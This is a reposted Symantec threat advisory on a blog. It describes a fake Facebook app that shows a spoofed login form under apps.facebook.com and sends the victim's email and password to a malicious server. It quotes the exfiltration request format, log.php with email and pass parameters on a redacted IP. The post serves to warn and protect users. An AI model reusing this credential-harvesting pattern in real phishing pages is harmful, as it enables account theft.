>Another Fake Facebook App is Here to Steal your Passwords

>Subscribe to The BULLDOG Estate by Email
Source : Symantec.com

Another Fake Facebook App is Here to Steal your Passwords

Posted: 6 hours 13 min ago
Hardik Shah's picture
00 Votes

Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook:
Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again:
When the user clicks on the “Login” button, it will show the login form:

When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>
Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show apps.facebook.com when the login form is displayed, even though the credentials will be posted to a malicious site instead.
The following are the fiddler logs that show email addresses and passwords being posted to the malicious server:

The bogus app also “likes” the link in an automatic post, which will be displayed on the user’s profile:

We have also observed a similar attack hosted on the same IP address. It displays a different message: “Video: This is the best April Fools’ prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts:
The good news is that Symantec customers are protected from this attack. We at Symantec urge the readers to install all security patches and definitions regularly.

Share Leave a Comment and Share to Facebook


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: